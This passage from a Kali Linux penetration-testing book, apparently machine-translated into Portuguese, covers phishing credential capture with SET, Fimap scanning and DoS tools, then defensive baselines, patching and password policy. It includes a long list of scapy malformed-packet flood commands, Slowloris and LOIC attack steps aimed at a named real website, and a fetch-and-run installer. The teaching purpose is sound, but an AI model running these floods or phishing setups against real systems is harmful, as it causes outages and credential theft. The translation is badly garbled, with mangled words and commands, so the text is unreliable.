Quando entramos em nosso nome de usurio no site falso Facebook, SET captura o trfego.
SET tambm ir redirecionar os usurios para o site real. A esperana que as vtimas sero
acredito que eles entraram na sua senha incorreta quando redirecionado para o real e Facebook
continuar usando Facebook sem saber que SET capturado suas credenciais de login:
O exemplo anterior mostra SET havia capturado o nosso nome de usurio: DrChaos, e nossa
Senha como ILoveKali.
Quando tiver concludo este exerccio, pressione Ctrl + C para sair da ferramenta SET e
gerar um relatrio HTML. SET cria um relatrio profissional que pode ser utilizado em
seu teste de penetrao relata:
[233]
Ataques na Web
Fimap
Fimap uma ferramenta Python que pode encontrar, preparar, auditoria, explorar e Google
automaticamente
para o arquivo local e remoto Incluso (LFI e RFI) bugs em aplicaes web.
Fimap pode ser encontrado em Aplicaes Web |Scanners de Vulnerabilidade Web |
Fimap. Quando voc abre Fimap, uma janela de terminal abre exibindo a casa
tela. Fimap tem algumas opes do plugin, que voc pode baixar usando a
seguinte comando:
Fimap - install-plugins
Todos os plugins disponveis sero exibidos como uma lista, com a opo de escolher um para
instalar
ou ento sair. No exemplo a seguir, h dois plugins disponveis para instalar. Voc
ter que executar o comando instalar duas vezes para instalar cada plugin individualmente:
Para usar Fimap, primeiro voc precisa determinar o seu alvo, especificando a URL. L
so opes para especificar uma URL, uma lista de URLs usando o Google para adquirir URLs, ou
outro
mtodos, como URLs de colheita de outras URLs, bem como olhar para as formas e
cabealhos. Por exemplo, o seguinte, vamos direcionar www.thesecurityblogger.com.
[234]
Captulo 6
Para digitalizar thesecurityblogger.com site, digite o seguinte comando:
Fimap-u 'http://wwwthesecurityblogger.com'
Fimap tentar identificar as vulnerabilidades de incluso de arquivos. A sequncia
exemplo mostra que o nosso objectivo no vulnervel a um ataque de incluso de arquivos:
Negao de Servios (DoS)
Normalmente, um exerccio de teste de penetrao focada em identificar as lacunas na
segurana, em vez de prejudicar o sistema. Esta uma caracterstica chave que separa uma
verdadeira
atacante de um verificador da penetrao autorizado. Hackers de verdade no seguem as regras
e no esto preocupados com a interrupo de negcios, se ele pode melhorar a sua situao.
Em alguns casos, um hacker est olhando para criar qualquer tipo de impacto negativo sobre um alvo,
incluindo derrubar sistemas crticos. Por esta razo, faz todo o sentido, em alguns casos
para testar sistemas para o risco de Denial of Service (DoS) tipo ataques. Isto vulgarmente
denominado como testes de estresse de seus servios voltado para a Internet.
absolutamente fundamental ter uma aprovao para testar um trunfo para DoS
vulnerabilidades. Alguns mtodos de ataque pode ter um impacto negativo para
um sistema de teste ps-penetrao. Aconselha-se a testar contra redundante
sistemas, equipamentos de laboratrio, ou sistemas de no-produo, se possvel.
O ataque mais comum envolve DoS inundando um alvo com a comunicao externa
pedidos. Essa sobrecarga impede o recurso de responder ao trfego legtimo,
ou retarda a sua resposta de forma to significativa que ele processado indisponveis. Ataques DoS
pode direcionar os recursos do sistema (IE espao em disco, largura de banda, e assim por diante), a
configurao
informao (ou seja, remover tabelas de rotas), informaes sobre o estado (o restabelecimento
sesso TCP), ou
qualquer coisa que possa prejudicar o funcionamento do sistema.
A diferena entre um e DoS Negao de servio distribuda
(DDoS) que um ataque de negao de servio envolve uma mquina enquanto
um DDoS
ataque envolve muitos. DDoS est fora do escopo deste texto.
[235]
Ataques na Web
Existem quatro categorias principais de ataque DoS / DDoS:
Desconto Baseado Ataques: Trata-se de enchentes, inundaes UDP ICMP, e outros
inundaes baseadas em pacotes falsificados. O propsito o de saturar a largura de
banda de
website da vtima.
Os ataques de protocolo: Ele consome recursos de servidores ou intermedirio
equipamentos de comunicao, tais como roteadores, firewalls, balanceadores de
carga,
e assim por diante. Exemplos disso so as inundaes SYN, Ping da morte, Smurf,
Teardrop,
pacotes fragmentados, e assim por diante. Ataques Camada de Aplicao: Ele aproveita o trfego legtimo para travar a web
servio. Os exemplos incluem ataques de dia zero, a explorao da vulnerabilidade,
e assim por diante.
Sesso de Exausto: Abusando limitaes sesso, estabelecendo repetidamente
mas no fechando novas sesses com o objetivo de consumir recursos.



Kali Linux contm vrias ferramentas de explorao de vulnerabilidade abordados no anterior
captulos que podem ser usados para a camada de aplicao ataques DoS como Metasploit.
Alm disso, Captulo 3 cobria uma ferramenta popular scapy Protocolo DoS. Aqui esto mais algumas
ferramentas
disponvel em Kali Linux para realizar ataques DoS:
Para testar DoS, voc pode usar www.upordown.org para ver se
um site est disponvel.
THC-SSL-DOS
O Secure Socket Layer (SSL) usado para proteger as conexes e
transaes atravs da Internet. Estabelecendo uma conexo segura SSL requer de 15x
mais poder de processamento no servidor do cliente. THC-SSL-DOS explora este
propriedade assimtrica por sobrecarregar o servidor at que ele incapaz de fornecer qualquer
servio a usurios legtimos. O ataque explora o recurso de re-negociao segura SSL
para disparar milhares de renegociaes usando uma nica conexo TCP. Isto conhecido
como SSL-Exausto ataque. A vantagem desta abordagem que a transformao
capacidade de apertos de mo SSL muito superior no lado do cliente, o que significa que um comum
laptop atravs de uma conexo de rede mdia pode desafiar um servidor de aplicativos web.
Esta uma vulnerabilidade conhecida, e no existe soluo real para remediar este a partir do
escrita deste texto.
[236]
Captulo 6
Para acessar THC-SSL-DOS, navegue at Teste de Estresse |Teste Web Stress |THC-SSL-
dos. Isso far com que uma janela do terminal com a pgina inicial para THC-SSL-DOS. Para
executar THC-SSL-DOS contra um alvo, o tipo t:
THC-SSL-dos [opes] <ip do <port> victim> e - aceitar
Voc deve incluir - Aceitar ou voc receber a seguinte mensagem de erro:
Uma vez THC-SSL-DOS executado, voc ver alguns palavreado engraado informando que
iniciar o processo de aperto de mo e que est sendo explorado. Na imagem seguinte,
vamos mostrar um site que no alavancar SSL, portanto mostrando erros de conexo.
A segunda imagem mostra os apertos de mo bem-sucedidas, o que acabar
DoS o alvo. Lembre-se, voc s deve tentar isso em IPs e sites voc
tem permisso para testar. Estes ataques podem danificar severamente um web site ou
aplicao web:
[237]
Ataques na Web
Scapy
Uma das ferramentas mais populares DoS scapy. Scapy uma ferramenta de manipulao de
pacotes para
redes de computadores, escrito em Python por Philippe Biondi. Scapy pode forjar ou decodificar
pacotes, envi-los no fio, captur-los, e as solicitaes e as respostas de jogo. Alm disso,
ele pode lidar com tarefas como digitalizao, tracerouting, sondagem, testes de unidade, ataques, e
a descoberta de rede.
Um truque comum manipular pacotes TCP do Kali e envi-lo via scapy.
Para iniciar scapy, tipo scapy na janela do terminal. Uma vez scapy foi lanado,
digitar sintaxe de comando:
Nesta tela a seguir, vamos usar scapy para enviar TCP malformado
pacotes para o nosso servidor de teste. Neste caso de uso, o nosso servidor de teste 10.0.0.1. Este
pode ser um
roteador ou um servidor web. Tambm, vamos especificar o nmero de pacotes que sero
enviar para o nosso destino. Neste caso estamos enviando 2000 pacotes usando o comando:
enviar (IP (dst = "10.0.0.1", ttl = 0) / TCP (), iface = "eth0", count = 2000)
Na linha de comando anterior, estamos enviando 2000 pacotes a partir de nossa eth0 interface
em nosso servidor Kali para o endereo de destino 10.0.0.1. Alm disso, estamos enviando
o alvo de um tempo para viver valor de 0. Isso muito bonito impossvel de um TCP
ponto de vista. Essencialmente, estamos tentando confundir o servidor web com um mau TTL
valor. Atacantes na vida real mandar milhes desses pacotes. Deve notar-se que um
sistema sob as circunstncias corretas pode falhar ou se tornar corruptos de uma nica m
ou pacote malformado. Podemos ajustar a contagem ou outros parmetros que podem precisar de
para o nosso ataque:
Aqui esto alguns outros cenrios de ataque populares usados por scapy:
Bad IP verso
enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", verso = 0) /
TCP (dport = "www"), iface = "eth0", count = 2000)
[238]
Captulo 6
Bad TCP checksum
enviar (IP (dst = "10.0.0.1") / TCP (chksum = 0x5555), iface = "eth0", count = 2000)
Bad TCP Flags (tudo esclarecido e SEQ # == 0)
enviar (IP (dst = "10.0.0.1") / TCP (flags = "", seq = 555), iface = "eth0",
count = 2000)
Bandeiras Bad TCP (All Flags Set)
enviar (IP (dst = "10.0.0.1") / TCP (flags = 0x0ff), iface = "eth0", count = 2000)
FIN nico conjunto
enviar (IP (dst = "10.0.0.1") / TCP (flags = "F"), iface = "eth0", count = 2000)
Length> L2 Comprimento
enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", o DIH = 15L) / TCP (dport = "www"),
iface = "eth0", count = 2000)
Comprimento Header Too Short
enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", o DIH = 2L) / TCP (dport = "www"),
iface = "eth0", count = 2000)
ICMP Flood
enviar (IP (dst = "10.0.0.1") / ICMP (), iface = "eth0", count = 2000)
IP erro de checksum
enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", chksum = 0x5500) /
TCP (dport = "www"), iface = "eth0", count = 2000)
IP Fragment
enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", frag = 1) / TCP (dport = "www"),
iface = "eth0", count = 2000)
IP Comprimento> L2
Comprimento
enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", o DIH = 5L, len = 80) /
TCP (dport = "www"), iface = "eth0", count = 2000)
Fonte endereo IP == Destination Address
enviar (IP (dst = "10.0.0.1", src = "10.0.0.1") / TCP (dport = "www"),
iface = "eth0", count = 2000)
[239]
Ataques na Web
L2 Comprimento >> IP
Comprimento
enviar (IP (dst = "10.0.0.1", len = 32) / Raw (load = "bla-bla-bla-bla-bla-bla-
bla-bla "), iface =" eth0 ", count = 2000)
enviar (IP (dst = "10.0.0.1", len = 32) / UDP (dport = 80, len = 48) / Raw (load =
"Bla-bla-bla-bla-bla-bla-bla-bla"), iface = "eth0", count = 2000)
enviar (IP (dst = "10.0.0.1", len = 32) / ICMP () / Raw (load = "bla-bla-bla-bla-
bla-bla-bla-bla "), iface =" eth0 ", count = 2000)
No L4
enviar (IP (dst = "10.0.0.1", src = "10.20.30.40"), iface = "eth0," count = 2000)
SYN && FIN Set
enviar (IP (dst = "10.0.0.1") / TCP (flags = "FS"), iface = "eth0", count = 2000)
TCP Header Length> L2 Comprimento
enviar (IP (dst = "10.0.0.1", src = "10.20.30.40") /
TCP (dport = "www", dataofs = 15L), iface = "eth0", count = 2000)
TCP Header Length Too Short (comprimento <5)
enviar (IP (dst = "10.0.0.1", src = "10.20.30.40") /
TCP (dport = "www", dataofs = 1 L), iface = "eth0", count = 2000)
SlowLoris
[240]
Captulo 6
SlowLoris um cliente HTTP baixa largura de banda que pode emitir ataques DoS. O que faz
SlowLoris nico o seu mtodo de atacar um alvo sem usar inundaes comum
tcnicas. SlowLoris mantm conexes abertas atravs do envio de solicitaes HTTP parciais. Ele
continua a enviar centenas de cabealhos subseqentes em intervalos regulares para manter
soquetes de fechamento. Este comportamento vai sobrecarregar os recursos do alvo, fazendo com
que
o incapaz de responder ao trfego legtimo. Sites de alto trfego pode levar um longo tempo
para liberar soquetes disponveis, porque os outros usurios devem terminar seus pedidos antes
as tomadas se tornam disponveis para SlowLoris para consumir. No entanto, SlowLoris
acabar por inundar todos os soquetes disponveis, matando servio ao site da vtima.
SlowLoris tira proveito de servidores que utilizam processamento de rosca, o que significa
vulnervel a limitar a quantidade de rosca permitida. Exemplos incluem
1.x Apache, 2.x, dhttpd, GoAhead, e assim por diante.
No SlowLoris no vem instalado no Kali Linux. Voc pode baixar a partir de SlowLoris
http://ckers.org/slowloris
Para executar SlowLoris, baixe o . Pl script e abrir um terminal de comando. Ir
para a pasta com o script e digite:
perl slowloris.pl
Isso far com que o ecr principal. Para executar SlowLoris em um alvo, digite o
mesmo comando seguido de -Dns e seu alvo. Por exemplo, para atacar
www.thesecurityblogger.com, Digite:
perl slowloris.pl-dns thesecurityblogger.com
[241]
Ataques na Web
Voc vai ver SlowLoris consumir soquetes disponveis, o que acabar por levar para baixo
seu alvo:
Se SlowLoris capaz de fazer a sua magia, o seu alvo ficaro indisponveis:
DoS exemplo ataque www.thesecurityblogger.com (Por favor, no
teste contra este site)
Low Orbit Ion Canho
Low Orbit Ion Canho (LOIC) uma ferramenta de teste de estresse de rede, o que significa que
projetado
para testar a quantidade de trfego de um alvo pode manipular para o planejamento de expectativas
futuras de recursos.
O software tem inspirado outros softwares similares, tais como JavaScript, LOIC, que
permite que um usurio para fazer testes de estresse diretamente de um navegador web.
O software foi usado famosa por Anonymous para ajud-los a facilitar ataques DDoS
contra vrios sites, incluindo algumas entidades pblicas muito conhecidas. Alguns
argumentao jurdica foram feitos que LOIC semelhante a ir a um site vrios
mil vezes, no entanto, alguns grupos de policiais americanos tratam o uso de
LOIC como uma violao da lei de segurana de computador e fraude.
[242]
Captulo 6
Para instalar o LOIC, Abra uma janela de terminal e digite:
apt-get update
aptitude install git-core monodevelop
apt-get install mono-gmcs
Uma vez que seja completa, v para o diretrio desktop usando cd / Desktop e criar um
pasta chamada loic usando o seguinte comando:
mkdir loic
Navegue at a pasta usando cd / loic e digite o seguinte comando:
wget https://raw.github.com/nicolargo/loicinstaller/ master / loic.sh
Em seguida, dar permisses para o arquivo de script usando o comando:
loic.sh chmod 777
O ltimo passo executar o script usando o seguinte comando:
. / Loic.sh instalar
[243]
Ataques na Web
Se voc no receber quaisquer mensagens de erro da execuo do script, ento voc est pronto
para
atualizar loic. Para atualizar, use o seguinte comando:
. / Loic / update sh
Finalmente, hora de lanar LOIC. Voc pode fazer isso usando o seguinte comando:
. / Loic.sh prazo
Usando LOIC simples. Voc pode selecionar se voc gostaria de usar o modo manual
ou Modo de IRC. Vamos escolher o modo manual para o seguinte exemplo.
Em seguida, voc pode escolher o URL ou endereo IP que pretende inundar. Vamos usar o IP
endereo 127.0.0.1 por exemplo, o seguinte. LOIC oferece opes de ataque, se voc gosta
para modificar as configuraes de TCP ou UDP.
[244]
Captulo 6
Quando voc estiver pronto para lanar o seu ataque, pressione o boto de IMMA CHARGIN
MAH LAZER. LOIC mostrar o ataque est em andamento. Clique no Pare de Inundaes
boto para parar o ataque:
Outras
ferramentas
Kali Linux oferece muitas ferramentas que podem ser teis para ataques baseados na web. Aqui
esto
algumas ferramentas adicionais disponveis em Kali Linux que no foram cobertos e poderia
ser usado para testes de penetrao remoto.
DNSCHEF
DNSChef um proxy DNS para Penetration Testers e malware analistas. Um DNS
proxy tambm conhecida como "DNS Falso" uma ferramenta utilizada para o trfego de rede
aplicao
anlise e outros casos de uso. Domain Name System (DNS) uma nomenclatura distribudo
sistema para computadores, servios ou qualquer recurso conectado Internet ou privada
rede. Fornecer endereos DNS falsos podem redirecionar o trfego para outros locais desejados.
[245]
Ataques na Web
Por exemplo, uma procurao DNS pode ser utilizada para pedidos de falsos badguy.com apontar
uma mquina local para a resciso ou interceptao em vez de uma srie de verdade em algum
lugar
a Internet. Para que isso funcione, voc precisa ter acesso e modificar as entradas DNS em um
nico servidor ou veneno real DNS para que o trfego chega ao servidor Kali Linux. O
DNSChef ferramenta fcil de usar, no entanto, o desafio o mtodo de ataque de DNS para
direcionar o trfego para Kali Linux.
SniffJoke
SniffJoke lida com a sua conexo TCP transparente, proporcionando atraso, modificando
e injetando pacotes falsos dentro de sua transmisso. Este processo faz com que seja extremamente
difceis para uma tecnologia passiva escutas telefnicas como um IDS / IPS ou sniffer para
interpretar correctamente o trfego. Isto feito atravs da explorao do que se presume registada
por um sniffer e que transmitido pelo cliente, fazendo com que este inconsistente para o
algoritmo de remontagem pacote. Os prximos dois diagramas de mostrar o trfego de escutas
telefnicas
entre dois usurios sem e com SniffJoke.
[246]
Captulo 6
Cerco
Siege um HTTP / HTTPS utilitrio testes de estresse projetado para desenvolvedores web
medir o desempenho do seu cdigo sob coao. Siege oferece multi-thread
Testes de carga HTTP e benchmarking por bater um servidor web com um configurvel
nmero de concorrentes, os usurios simulados. Siege oferece uma regresso, simulao Internet
e modos de fora bruta.
Voc pode encontrar sob cerco Teste de Estresse |Testes de stress de rede |Siege:
Para executar Siege, digite o seguinte comando:
cerco [opes] <target URL>
A imagem seguinte mostra a execuo cerco contra www.thesecurityblogger.
com. A contagem de usurio padro 15, como mostrado na imagem. Quando voc parar o
Testes de Siege, a ferramenta fornece um teste de estresse ps-relatrio da seguinte forma:
[247]
Ataques na Web
Inundator
Inundator uma ferramenta que foge Sistemas de Intruso deteco (IDS) e Intrusion
Sistemas de Preveno (IPS) por inundar seus arquivos de log. O conceito que voc pode
quer inundar um alvo com falsos positivos, assim voc pode se esconder de um ataque real a partir
de um
reao e ponto de vista forense. Inundator tambm pode ser usado para testar a eficcia
do sistema de alerta de suas ferramentas de relatrios de segurana, como SIEM e IDS / IPS.
TCPReplay
TCPReplay utiliza trfego previamente capturado em libpcap formato para testar uma variedade de
dispositivos de rede. TCPReplay pode classificar o trfego como cliente ou servidor, reescrita Camada
2, 3 e 4 cabealhos e repetir o trfego de volta para a rede, bem como atravs de
outros dispositivos, tais como switches, roteadores, firewalls e IDS / IPS. TCPReplay apoios
modos NIC simples e dupla para testar tanto sniffing e dispositivos embutidos.
Basicamente, TCPReplay pode capturar o trfego entre o cliente eo servidor, e reproduzi-lo
qualquer ponto da rede.
[248]
Captulo 6
Resumo
Este captulo termina revendo vrios mtodos disponveis em Kali Linux 1.0 que
poderia ser usado para realizar testes de penetrao contra servidores de aplicativos web. Em
Neste ponto, os leitores devem saber como pesquisar um alvo, identificar as vulnerabilidades
nesse alvo, bem como todas as interaes associadas com host e clientes, explorar
vulnerabilidades, e servios de interrupo, se desejar. Este texto uma breve viso geral das
ferramentas
disponvel em Kali Linux, no entanto, existem muitas outras ferramentas alm Kali Linux
que devem ser includos em seu arsenal Teste de Invaso. Kali Linux oferece uma srie
de valor, com conjuntos de ferramentas nativas, no entanto, as melhores ferramentas de alavancagem
Penetrao Testers
alm de Kali, tais como ataques do tipo Zero Day baseados em scripts e utilitrios personalizados.
Ns
recomendar pesquisando e testando vrias ferramentas para mtodos de ataque abordados neste
texto para crescer a sua experincia como um verificador da penetrao profissional.
Este captulo concentra na identificao e explorao de vulnerabilidades remotamente como
relacionada a ataques baseados na Internet. Cobrimos ataques de explorao do navegador, Proxy
ataques, e colheita de senha. Concluiu-se com os mtodos para interromper servios
como um meio de aplicaes web de teste de estresse, bem como identificar o quo vulnervel
alvos so a ataques DoS.
O prximo captulo vai mudar de marcha, olhando para como se defender de aplicaes web
utilizando ferramentas disponveis no Kali Linux 1.0.
[249]
Contramedidas defensivas
At este captulo, ns cobrimos como usar Kali Linux para comprometer as metas.
Agora hora de trocar as marchas e se tornar o zagueiro com o objetivo de evitar
sendo comprometida por mtodos que tm demonstrado neste livro, bem como
outras formas de ataque. Defendendo um recurso voltado para a Internet extremamente difcil,
com base no que est sendo exposta a todo o mundo atravs de acesso pblico, misturado com o
operaes exigncia de no ser capaz de impactar o servio a usurios confiveis a um custo
de segurana. absolutamente crtico para incluir a segurana em todo o ciclo de vida de
concepo at a resciso do pblico enfrenta qualquer coisa, em vez de considerar a segurana
como uma reflexo tardia. Isto no s ir reduzir o risco de ameaas contra o servio,
mas tambm provvel ser menos caro para remediar, no caso de um incidente ciberntico.
do conhecimento comum que existem pessoas ms sistemas de ataque sobre a
Internet, independentemente da natureza do negcio. Como uma medida contra defensiva,
organizaes depositam sua confiana em solues para defesa contra essas ameaas cibernticas.
O
problema com essa estratgia o vendedor no vtima de um ataque e no
absorver os danos de um incidente ciberntico. Os vendedores vo oferecer proteo, no entanto,
eles no podem ser responsveis por qualquer coisa fora do controle do seu produto. Tudo o que
precisamos
uma falta de atualizao, erro de configurao, ou milhes de situaes que podem causar uma
brecha para que o vendedor no ser responsvel. Alm disso, muitas organizaes de alavancagem
solues de vrios fornecedores que no compartilham de inteligncia de segurana, fazendo o
possvel para
responsabilidade a ser passado para trs e para frente entre os fornecedores. Por estas e outras
razes,
recomendamos aos clientes tomar posse a responsabilidade de proteger os ativos por
sistemas de endurecimento das ameaas.
Contramedidas defensivas
Kali Linux uma ferramenta principal teste de penetrao que podem ser utilizados para identificar
onde
sistemas so vulnerveis a ataques. Ao invs de atacar um alvo, recomendamos
Penetrao Teste seus prprios ativos de rede para identificar as vulnerabilidades antes de um
indivduo mal-intencionado bate-lhe a ele. Para citar Sun Tzu a partir de A Arte da Guerra:
"Se voc conhece o inimigo e conhece a si mesmo, voc no precisa temer o resultado
de um
cem batalhas. Se voc se conhece mas no o inimigo, para cada vitria ganha
voc tambm vai sofrer uma derrota. Se voc no conhece nem o inimigo nem a si
mesmo, voc vai
sucumbir em todas as batalhas "
Ns acreditamos que os mesmos conceitos fundamentais so verdadeiras; usar Kali Linux para
conhecer a si mesmo,
e conhecer a sua fraqueza.
A vantagem que voc tem que voc sabe que est acontecendo, voc pode usar e extrema
medidas sem a preocupao de acionar alarmes. Normalmente, os hackers no vai arriscar
expondo-se, reduzindo as suas opes para o ataque. Discrio requer pacincia,
toque mnimo para o alvo, e muito planejamento. at voc para capitalizar sobre o seu
capacidade de investir tempo e recursos adequada em segurana antes que algum investe
mais em atravess-lo. Um ditado comum entre os autores deste livro "99 por cento
seguro um inseguro 100 por cento ".
Este captulo ir fornecer diferentes mtodos de utilizao de Kali Linux para auditar o seu web
aplicativos para vulnerabilidades comuns, bem como outras melhores prticas para o endurecimento
sua rede. Ns vamos cobrir as linhas de base de segurana, gerenciamento de patches, password
polticas, e defender-se contra os mtodos de ataque, cobertas nos captulos anteriores.
Este captulo tambm inclui uma seo focada em usar Kali Linux em um forense
investigao. Forensics importante depois de identificar que sua aplicao web ou
outros ativos ter sido comprometida, para evitar futuras impacto negativo.
Testando suas defesas
Como explicado na introduo, a melhor abordagem para endurecer a sua defesa
atacando seus controles de segurana existentes, com o objetivo de identificar fraqueza.
Alguns conceitos-chave a considerar ao desenvolver uma estratgia para testar seu ciberntico
defesas de segurana so os seguintes:




Preto, branco, cinza ou abordagem chapu?
Teste uma cpia ou o sistema real?
Possveis riscos de Teste de Invaso?
Quem deve ser informado?
[252]
Captulo 7


Voc est testando deteco e resposta a ameaas ou focando
identificao de vulnerabilidades?
So todos os padres de conformidade a ser considerada?
Vejamos que estabelece um plano para validar a nossa segurana. Primeiro precisamos
conhecer a nossa linha de base para a segurana, por isso sabemos o que para validar
contra.
Segurana da linha de
base
Uma pergunta comum feita por especialistas do setor o que deve ser o mnimo
nvel aceitvel de segurana. Muitas organizaes devem estar em conformidade com
mandatos especificados por sua indstria e do governo. Qualquer sistema de aceitar
pagamentos devem aderir ao Payment Card Industry Data Security Standard
(PCI DSS). Ambientes de sade deve atender Seguro de Sade Portabilidade e
Responsabilidade normas (HIPAA). Mandatos comuns, como estes so cobertos
em Captulo 8, Relatrio Executivo teste de penetrao, so impulsionadores de negcios
populares para
mostrando valor para os servios de testes de penetrao.
Fora dos mandatos, um bom ponto de partida para o estabelecimento de uma linha de base para a
segurana
est analisando como outras agncias de proteger seus sistemas. Como consultores de segurana
para
Clientes americanos, identificamos como o governo dos Estados Unidos assegura sensvel
informao como um exemplo para a segurana da linha de base. A maioria das organizaes norte-
americanas seria
estar interessado em ter padres de segurana semelhantes como a Casa Branca. Esta mesma
conceito pode ser aplicado a outros padres de TI pas, a segurana organismo especfico
melhores prticas, ou controles militares recomendadas de segurana. H tambm as melhores
prticas
para os padres de segurana publicados a partir de organizaes formadas por fornecedores e
indstria
lderes, como a Organizao Internacional de Normalizao (ISO).
Vamos dar uma olhada na linha de base de segurana dos Estados Unidos de qualquer coisa
o acesso a uma
rede controlada pelo governo.
Sua linha de base para a segurana deve ser o nvel mnimo absoluto de segurana
utilizado em seu ambiente. A melhor prtica assegurar sistemas alm do
linha de base, porque as linhas de base de segurana como mais documentados so
limitados, devido
a data de publicao, a influncia dos partidos de financiamento, e outros elementos.
[253]
Contramedidas defensivas
STIG
AGuia de Segurana Tcnico de Implementao (STIG) uma metodologia para
instalao e manuteno do software de computador seguro e padronizado
hardware. Este termo foi cunhado pelo Agncia de Defesa de Sistemas de Informao
(DISA), que cria documentos de configurao em apoio da Organizao das Naes
Unidos Departamento da defesa (DOD). As diretrizes de implementao incluem
processos administrativos recomendadas e controles de segurana utilizados durante o
ciclo de vida do ativo.
Um exemplo onde Stigs seria de benefcio est na configurao de uma rea de trabalho
computador. A maioria dos sistemas operacionais no so inerentemente seguros, deixando-os
vulnerveis
para os criminosos. A STIG descreve como minimizar ataques baseados na rede e prevenir
o acesso ao sistema quando o invasor est presente no dispositivo. Stigs tambm descrevem
processos de manuteno, tais como atualizaes de software e patches vulnerabilidade.
Stigs so grandes diretrizes para proteger os sistemas operacionais, dispositivos de rede, e
aplicaes. Voc pode baixar diretrizes STIG de http://www.stigviewer.
com.br / Stigs. Voc vai encontrar documentos STIG contm guias passo-a-passo para o
endurecimento
uma variedade de sistemas, incluindo servidores web. Alm disso, as diretrizes STIG so um ponto
de partida
apontam para a configurao de sistemas para atender a vrios padres de conformidade
regulamentar.
Para Estados Unidos funcionrios federais, Stigs so necessrios para os sistemas em redes
controlado pelo Departamento de Defesa e outras organizaes governamentais.
Existem muitos outros recursos disponveis para encontrar segurana
modelos de normalizao. Exemplos so o Center for Internet
Segurana (CIS) e Cisco Protection Network Foundation (NFP).
O gerenciamento de
patches
Com ataques direcionados e vulnerabilidades de dia zero, reduzindo a janela de tempo
entre o momento em que uma vulnerabilidade divulgada e os atacantes desenvolver um exploit,

tornando-se mais compete gerentes de segurana de entender os ativos em sua
Ambiente de TI, e os nveis de correo desses sistemas. Gerenciamento de patches um
processo contnuo e s pode ser bem sucedido se houver um mtodo para identificar quando
um patch est disponvel, priorizar quando implementar o patch, valid-lo sobre
o cumprimento do negcio, e como reagir quando um patch no est disponvel para um
conhecido
vulnerabilidade. Isso vale tambm para aplicaes dentro dos sistemas e software, tais
como plugins.
[254]
Captulo 7
Gerar
Estado
Relatrios
Baixar
e
Implantar
Patches
Atualizar
Vulnerabilidade
Detalhes
a partir de
Vendedores
Digitalizar o
Rede
Identificar
Vulnervel
Sistemas
Gerenciamento de patches apenas um aspecto do ciclo de vida maior vulnerabilidade. O primeiro
passo identificar as vulnerabilidades, o que pode ser feito atravs de atualizaes do fornecedor ou
servios que vo da verificao peridica de testes de penetrao de hardcore. L
deve ser uma poltica que explica como muitas vezes diferentes nveis de exames so realizados
assim como quem o responsvel para analisar as ameaas que so encontrados. Um bom ponto de
partida
para estabelecer uma linha de base para a freqncia de varredura de vulnerabilidades est revendo o
que
padres de conformidade regulamentar que deve seguir, como muitos incluem lngua em torno de
varredura de vulnerabilidades internas e externas.
O segundo passo para o gerenciamento de patches est reagindo aos sistemas identificados como
vulnervel. Como explicado em Captulo 1, Teste de Invaso e configurao, sendo
vulnervel no significa necessariamente que h um risco a menos que a vulnerabilidade
validada atravs da explorao, durante um teste de penetrao ou outro mtodo.
Protegendo a vulnerabilidade pode simplesmente exigir um patch ou atualizao, no entanto,
algumas vulnerabilidades podem exigir mais investimento em tempo e trabalho para remediar.
Clculo do risco associado ao investimento para remediar entra em jogo
para estas situaes.
O passo final no gerenciamento de patches est programando o patch que se refere
como crtica a vulnerabilidade a operaes comerciais. Esta uma chave, como muitos
sistemas comprometidos poderia ter sido salvo se fossem corrigidas antes de ser
identificado por um partido malicioso. Ns encontramos muitos dos nossos clientes tm manuteno
janelas programadas em uma base mensal ou mais para o gerenciamento de patches, que
deixa uma grande janela de tempo para serem expostos, no caso de um sistema se torna
vulnervel a ataques. A melhor prtica a atribuio de um especialista Information Assurance
da responsabilidade do clculo do risco associado com sistemas identificados como
vulnerveis, bem como ter a autoridade para janelas de manuteno quando um trunfo
ameaa atinge um determinado nvel de risco para as operaes comerciais.
[255]
Contramedidas defensivas
Gerenciamento de patches uma das melhores estratgias de defesa para evitar muitos dos
ameaas apresentadas neste livro. Certifique-se de rever como a sua organizao
lida com o gerenciamento de patches periodicamente para evitar ser vtima de expor uma
sistema vulnervel que poderia ter sido assegurada. Isto deve aplicar-se a todos gerenciados
ativos, incluindo servidores e aplicaes web.
As diretivas de senha
Em geral, ter uma poltica que controla os resultados possveis pode impactar negativamente
a fora de palavras-passe. Independentemente da poltica, os usurios tero pela natureza humana,
tente
para simplificar as senhas de qualquer maneira, possivelmente usando caracteres repetidos,
previsvel
comportamento, como o uso de 12345 para estender o comprimento de uma senha, ou outros meios.
Os usurios tambm normalmente no alterar senhas a menos que forado por um sistema. Para
estes
razes, uma poltica de senha deve seguir as seguintes orientaes:






J possui uma validade que est em 90 dias
No permitir que as ltimas cinco senhas como substitutos
Aplicar um comprimento de pelo menos 12
caracteres
No limitar quaisquer caracteres, como caracteres especiais
Mandato pelo menos uma letra maiscula, nmero e caractere especial
Avisar ou negar dgitos repetio como 12345 ou asdfg para evitar
ataques de fora bruta
Processamento do computador est constantemente a melhorar, o que significa 12
caracteres
senhas no ser forte no futuro prximo. Um artigo recente
publicado na primavera de 2013, afirmou uma equipe de hackers rachado mais de
14.800, de 16 caracteres senhas hash criptograficamente de uma lista
de 16.449. Este um caso especial no momento da publicao, no entanto,
ser o campo de batalha comum para hackers futuras. Considere o
comprimento recomendado de uma senha de um alvo em movimento.
Os autores deste livro so fs de gerador de senha por Steve Gibson, como um seguro
mtodo de gerao de senhas aleatrias. O gerador de seguro senha aleatria
por Steve Gibson pode ser encontrado no Centro de Pesquisa Gibson em: https://www.grc.com/
passwords.htm.
[256]
Captulo 7
Muitos sites e aplicaes web so comprometidas, porque web
desenvolvedores implementados protocolos de segurana pobres. Os desenvolvedores da
Web
deve usar criptografia forte para armazenar senhas de usurios e dados.
As senhas devem implementar hashing e salga tcnicas para promover
mitigar os riscos em dados roubados ou perdidos.
Voc pode avaliar a fora das senhas usadas em sua alavancagem sistemas
ferramentas de quebra de senha abordados Captulo 3, os ataques lado do servidor, e Captulo 4,
Os ataques do lado do cliente deste livro. Ferramentas sugeridas so John the Ripper, Johnny,
Hashcat, oclHashcat, e Ophcrack. Triturao e Hashcat pode tambm ser usado para
gerar listas de senhas para que possam comprovar a fora de sua poltica de senha.
Existem sites disponveis, como Crackstation, que oferecem pr-gerada
